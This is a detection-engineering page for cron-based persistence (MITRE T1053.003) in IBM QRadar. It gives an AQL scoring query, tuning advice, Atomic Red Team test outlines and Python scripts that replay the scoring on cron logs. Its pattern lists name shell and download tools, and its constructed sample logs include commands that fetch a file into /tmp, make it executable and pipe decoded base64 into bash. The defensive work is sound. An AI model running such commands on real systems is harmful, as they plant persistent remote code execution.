T1053.003 IBM QRadar · QRadar

Detect Cron in IBM QRadar

Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Adversaries use cron in Linux, macOS, and ESXi environments to execute programs at system startup or on a scheduled basis for persistence, privilege escalation, or execution. Real-world malware families including Kinsing, Skidmap, GoldMax, NKAbuse, Rocke, and Anchor have all leveraged cron for persistence. In ESXi environments, cron jobs must be created directly via the crontab file (e.g., /var/spool/cron/crontabs/root).

MITRE ATT&CK

Tactic
Execution Persistence Privilege Escalation
Technique
T1053 Scheduled Task/Job
Sub-technique
T1053.003 Cron
Canonical reference
https://attack.mitre.org/techniques/T1053/003/

QRadar Detection Query

IBM QRadar (AQL)

```sql
SELECT
  DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS event_time,
  sourceip,
  username,
  hostname,
  QIDNAME(qid) AS event_name,
  CATEGORYNAME(category) AS category_name,
  payload,
  CASE
    WHEN payload ILIKE '%crontab -e%' OR payload ILIKE '%crontab -r%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%/etc/crontab%' OR payload ILIKE '%/var/spool/cron%'
      OR payload ILIKE '%/etc/cron.d%' OR payload ILIKE '%/var/cron/tabs%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%wget%' OR payload ILIKE '%curl%'
      OR payload ILIKE '%/dev/tcp%' OR payload ILIKE '%base64 -d%'
      OR payload ILIKE '%openssl enc%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%bash -i%' OR payload ILIKE '%python -c%'
      OR payload ILIKE '%perl -e%' OR payload ILIKE '%sh -c%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%/tmp/%' OR payload ILIKE '%/dev/shm/%'
      OR payload ILIKE '%/var/tmp/%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%chmod +x%' OR payload ILIKE '%chmod 777%'
      OR payload ILIKE '%chmod 755%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%@reboot%' THEN 1
    ELSE 0
  END AS suspicion_score,
  CASE
    WHEN (
      CASE WHEN payload ILIKE '%crontab -e%' OR payload ILIKE '%crontab -r%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/etc/crontab%' OR payload ILIKE '%/var/spool/cron%' OR payload ILIKE '%/etc/cron.d%' OR payload ILIKE '%/var/cron/tabs%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%wget%' OR payload ILIKE '%curl%' OR payload ILIKE '%/dev/tcp%' OR payload ILIKE '%base64 -d%' OR payload ILIKE '%openssl enc%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%bash -i%' OR payload ILIKE '%python -c%' OR payload ILIKE '%perl -e%' OR payload ILIKE '%sh -c%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/tmp/%' OR payload ILIKE '%/dev/shm/%' OR payload ILIKE '%/var/tmp/%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%chmod +x%' OR payload ILIKE '%chmod 777%' OR payload ILIKE '%chmod 755%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%@reboot%' THEN 1 ELSE 0 END
    ) >= 4 THEN 'CRITICAL'
    WHEN (
      CASE WHEN payload ILIKE '%crontab -e%' OR payload ILIKE '%crontab -r%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/etc/crontab%' OR payload ILIKE '%/var/spool/cron%' OR payload ILIKE '%/etc/cron.d%' OR payload ILIKE '%/var/cron/tabs%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%wget%' OR payload ILIKE '%curl%' OR payload ILIKE '%/dev/tcp%' OR payload ILIKE '%base64 -d%' OR payload ILIKE '%openssl enc%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%bash -i%' OR payload ILIKE '%python -c%' OR payload ILIKE '%perl -e%' OR payload ILIKE '%sh -c%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/tmp/%' OR payload ILIKE '%/dev/shm/%' OR payload ILIKE '%/var/tmp/%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%chmod +x%' OR payload ILIKE '%chmod 777%' OR payload ILIKE '%chmod 755%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%@reboot%' THEN 1 ELSE 0 END
    ) >= 3 THEN 'HIGH'
    WHEN (
      CASE WHEN payload ILIKE '%crontab -e%' OR payload ILIKE '%crontab -r%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/etc/crontab%' OR payload ILIKE '%/var/spool/cron%' OR payload ILIKE '%/etc/cron.d%' OR payload ILIKE '%/var/cron/tabs%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%wget%' OR payload ILIKE '%curl%' OR payload ILIKE '%/dev/tcp%' OR payload ILIKE '%base64 -d%' OR payload ILIKE '%openssl enc%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%bash -i%' OR payload ILIKE '%python -c%' OR payload ILIKE '%perl -e%' OR payload ILIKE '%sh -c%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/tmp/%' OR payload ILIKE '%/dev/shm/%' OR payload ILIKE '%/var/tmp/%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%chmod +x%' OR payload ILIKE '%chmod 777%' OR payload ILIKE '%chmod 755%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%@reboot%' THEN 1 ELSE 0 END
    ) >= 2 THEN 'MEDIUM'
    ELSE 'LOW'
  END AS risk_level
FROM events
WHERE
  LOGSOURCETYPENAME(devicetype) IN ('Linux OS', 'Universal DSM', 'Syslog')
  AND (
    payload ILIKE '%crontab%'
    OR payload ILIKE '%/etc/crontab%'
    OR payload ILIKE '%/var/spool/cron%'
    OR payload ILIKE '%/etc/cron.d%'
    OR payload ILIKE '%/etc/cron.daily%'
    OR payload ILIKE '%/etc/cron.hourly%'
    OR payload ILIKE '%/etc/cron.weekly%'
    OR payload ILIKE '%/etc/cron.monthly%'
    OR payload ILIKE '%/var/cron/tabs%'
  )
HAVING suspicion_score > 0
ORDER BY suspicion_score DESC, starttime DESC
LIMIT 500
LAST 24 HOURS
```

Severity: High · Confidence: Medium

Detects T1053.003 cron abuse in QRadar by querying Linux and syslog log sources for cron-related file paths and commands over the last 24 hours, then scoring each event across seven indicator groups: crontab edits, cron file writes, download and decode tools, interpreter and reverse-shell invocations, temp-directory usage, chmod calls, and @reboot persistence. Each group adds at most one point to suspicion_score, and the risk level (LOW, MEDIUM, HIGH, CRITICAL) is assigned from threshold counts of the same indicators at 2, 3 and 4 matches.

Data Sources

  • QRadar SIEM
  • Linux OS log source
  • Syslog DSM
  • Universal DSM

Required Tables

events

False Positives & Tuning

  • Scheduled maintenance scripts installed by system administrators that write to /etc/cron.d/ during patch cycles
  • Monitoring agents (Datadog, New Relic, Splunk UF) that install cron jobs during initial deployment and may reference temp paths
  • CI/CD pipelines running on Linux build agents that use crontab to schedule build or cleanup jobs
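The scoring logic of the query and the tuning cases listed above can be exercised offline before the rule goes live. The following Python script is an added example, not part of this page or of QRadar: it mirrors the seven indicator groups as case-insensitive substring checks (the ILIKE patterns), applies the same 2/3/4 thresholds, and adds an assumed allowlist of agent names (datadog-agent, newrelic-infra, splunkforwarder are assumptions, not values from the page) that suppresses MEDIUM-or-lower hits from known installers. The sample payloads are constructed, not real telemetry.

```python
"""
Offline replica of the QRadar T1053.003 suspicion scoring.

Added example (not the detection page's or QRadar's code). Indicator groups
mirror the AQL query; the installer allowlist and sample log lines are assumed.
"""
from __future__ import annotations

# Scope filter, mirroring the WHERE clause of the AQL query.
CRON_SCOPE = (
    "crontab", "/etc/crontab", "/var/spool/cron", "/etc/cron.d",
    "/etc/cron.daily", "/etc/cron.hourly", "/etc/cron.weekly",
    "/etc/cron.monthly", "/var/cron/tabs",
)

# Seven indicator groups; each contributes at most one point, as in the query.
INDICATOR_GROUPS = {
    "crontab_edit": ("crontab -e", "crontab -r"),
    "cron_file_write": ("/etc/crontab", "/var/spool/cron", "/etc/cron.d", "/var/cron/tabs"),
    "download_tool": ("wget", "curl", "/dev/tcp", "base64 -d", "openssl enc"),
    "interpreter_shell": ("bash -i", "python -c", "perl -e", "sh -c"),
    "temp_path": ("/tmp/", "/dev/shm/", "/var/tmp/"),
    "chmod": ("chmod +x", "chmod 777", "chmod 755"),
    "reboot_persistence": ("@reboot",),
}

# Tuning allowlist (assumed process names): agents that legitimately install
# cron jobs and may reference temp paths while doing so. A known installer only
# suppresses MEDIUM and lower; a CRITICAL/HIGH hit is still surfaced.
KNOWN_INSTALLERS = ("datadog-agent", "newrelic-infra", "splunkforwarder")
SUPPRESS_AT_OR_BELOW = 2


def in_scope(payload: str) -> bool:
    p = payload.lower()
    return any(token in p for token in CRON_SCOPE)


def score(payload: str) -> tuple[int, list[str]]:
    """Return (suspicion_score, names of the indicator groups that matched)."""
    p = payload.lower()
    hits = [name for name, patterns in INDICATOR_GROUPS.items()
            if any(pat in p for pat in patterns)]
    return len(hits), hits


def risk_level(suspicion_score: int) -> str:
    if suspicion_score >= 4:
        return "CRITICAL"
    if suspicion_score >= 3:
        return "HIGH"
    if suspicion_score >= 2:
        return "MEDIUM"
    return "LOW"


def triage(payload: str) -> dict | None:
    """None when the event is out of scope or scores 0 (HAVING suspicion_score > 0)."""
    if not in_scope(payload):
        return None
    s, hits = score(payload)
    if s == 0:
        return None
    p = payload.lower()
    suppressed = s <= SUPPRESS_AT_OR_BELOW and any(k in p for k in KNOWN_INSTALLERS)
    return {"score": s, "risk": risk_level(s), "indicators": hits, "suppressed": suppressed}


# Constructed sample payloads, one per situation the page describes.
SAMPLE_EVENTS = {
    # Test 3/4 style: a cron.d drop that fetches, decodes and chmods a temp file.
    "cron_d_dropper": (
        "Jan 10 03:14:07 web01 sudo: root : COMMAND=/usr/bin/tee /etc/cron.d/argus-encoded-test ; "
        'echo "* * * * * root echo aGVsbG8= | base64 -d | bash -i" ; '
        "curl -s http://203.0.113.10/a -o /tmp/a ; chmod +x /tmp/a"
    ),
    # Tuning case: admin patch-cycle job written by configuration management.
    "patch_cycle": "Jan 10 02:00:01 web01 ansible: file /etc/cron.d/patch-window mode=0644 owner=root state=present",
    # Tuning case: monitoring agent installing a cron job from a temp path.
    "agent_install": "Jan 10 09:30:12 app02 datadog-agent: installed /etc/cron.d/datadog-agent-logrotate from /tmp/dd-install/cron.tmpl",
    # What the cron daemon itself logs after `crontab -e`; note there is no "-e" in it.
    "crontab_replace": "Jan 10 10:05:44 dev03 crontab[4412]: (alice) REPLACE (alice)",
    "unrelated": "Jan 10 11:00:00 dev03 sshd[777]: Accepted publickey for bob from 192.0.2.5 port 50012 ssh2",
}


def triage_samples() -> dict:
    return {name: triage(payload) for name, payload in SAMPLE_EVENTS.items()}


if __name__ == "__main__":
    for name, result in triage_samples().items():
        print(f"{name:16s} {result}")
```

The crontab_replace sample illustrates a caveat worth checking in your own telemetry: the cron daemon's own audit line for an interactive edit reads "(user) REPLACE (user)" and never contains "-e", so the crontab-edit indicator only fires on sources that log the process command line (auditd EXECVE records, shell auditing), not on /var/log/cron alone.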
Testing Methodology

Validate this detection against four Atomic Red Team tests. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Add Persistent Cron Job via crontab Command

    Expected signal: Auditd: syscall write/open on /var/spool/cron/crontabs/<username>. Syslog/cron log: CMD (/tmp/argus_test.sh) entries every minute. Process creation event for crontab command. File creation event for /tmp/argus_test.sh.

  2. Test 2: Add @reboot Persistence Entry to Crontab

    Expected signal: Auditd: write to /var/spool/cron/crontabs/<username> with @reboot content. Syslog: crontab modification event. Process creation for crontab command. File creation for /tmp/argus_backdoor_test.sh with chmod +x.

  3. Test 3: Direct Write to /etc/cron.d/ for System-Wide Persistence

    Expected signal: Auditd: file creation syscall on /etc/cron.d/argus-test-job. File creation event with initiating process bash/sudo. Syslog: within 5 minutes, CRON execution of curl command will appear in /var/log/cron or /var/log/syslog.

  4. Test 4: Cron Job with Base64-Encoded Payload Download

    Expected signal: File creation event on /etc/cron.d/argus-encoded-test. Cron execution logs showing base64 and bash commands. If wget succeeds (requires listener), process creation for wget and the payload. Auditd syscall records for file write.
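Several of the expected signals above are cron daemon execution lines ("CMD (/tmp/argus_test.sh) entries every minute", "cron execution logs showing base64 and bash commands"). The following Python script is an added example, not part of this page, that parses /var/log/cron lines in the cronie/vixie-cron format "<timestamp> <host> CRON[<pid>]: (<user>) CMD (<command>)" and flags per-user commands that run from a temp directory, contain decode or fetch tokens, or recur at one-minute intervals. The log sample is constructed to match what Tests 1 and 4 say you should see; thresholds and token lists are assumptions.

```python
"""
Parse cron execution logs and flag the telemetry the Atomic tests expect.

Added example (not the detection page's code). Sample lines are constructed in
the cronie/vixie-cron syslog format; thresholds and token lists are assumed.
"""
import re
from collections import defaultdict
from datetime import datetime

CRON_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"CRON\[(?P<pid>\d+)\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$"
)

TEMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
DECODE_OR_FETCH = ("base64 -d", "curl", "wget", "/dev/tcp")

# Constructed sample: a benign sysstat job, the Test 1 temp-path script firing
# every minute, a Test 4 style inline decode, and one non-CRON syslog line.
SAMPLE_CRON_LOG = """\
Jan 10 12:00:01 web01 CRON[2101]: (root) CMD (/usr/lib/sysstat/debian-sa1 1 1)
Jan 10 12:00:01 web01 CRON[2102]: (alice) CMD (/tmp/argus_test.sh)
Jan 10 12:01:01 web01 CRON[2140]: (alice) CMD (/tmp/argus_test.sh)
Jan 10 12:02:01 web01 CRON[2177]: (alice) CMD (/tmp/argus_test.sh)
Jan 10 12:05:01 web01 CRON[2260]: (root) CMD (/bin/bash -c "echo dGVzdA== | base64 -d | bash")
Jan 10 12:10:01 web01 CRON[2300]: (root) CMD (/usr/lib/sysstat/debian-sa1 1 1)
Jan 10 12:10:02 web01 systemd[1]: Started Session 9 of user alice.
"""


def parse_cron_log(text: str) -> list[dict]:
    """Return one dict per CRON CMD line; other syslog lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year; strptime defaults to 1900, which is
        # fine because only the differences between timestamps are used.
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        entries.append({"ts": ts, "host": m["host"], "pid": int(m["pid"]),
                        "user": m["user"], "cmd": m["cmd"]})
    return entries


def find_suspicious_cron_runs(entries: list[dict], min_runs: int = 3,
                              max_interval_s: int = 60) -> list[dict]:
    """Group runs by (host, user, command) and report the ones worth a look."""
    runs: dict[tuple, list[datetime]] = defaultdict(list)
    for e in entries:
        runs[(e["host"], e["user"], e["cmd"])].append(e["ts"])

    findings = []
    for (host, user, cmd), times in runs.items():
        times.sort()
        gaps = [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]
        min_gap = min(gaps) if gaps else None
        reasons = []
        if any(d in cmd for d in TEMP_DIRS):
            reasons.append("temp_path")
        if any(t in cmd for t in DECODE_OR_FETCH):
            reasons.append("decode_or_fetch")
        if len(times) >= min_runs and min_gap is not None and min_gap <= max_interval_s:
            reasons.append("rapid_recurrence")
        if reasons:
            findings.append({"host": host, "user": user, "command": cmd,
                             "runs": len(times), "min_interval_s": min_gap,
                             "reasons": reasons})
    # Most reasons first, then by command for a stable order.
    return sorted(findings, key=lambda f: (-len(f["reasons"]), f["command"]))


if __name__ == "__main__":
    for finding in find_suspicious_cron_runs(parse_cron_log(SAMPLE_CRON_LOG)):
        print(finding)
```

Run it against a real /var/log/cron or journalctl -u cron export after executing a test to confirm the CMD lines are actually being forwarded to QRadar; if the temp-path script never shows up here, the gap is in log collection rather than in the AQL rule.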
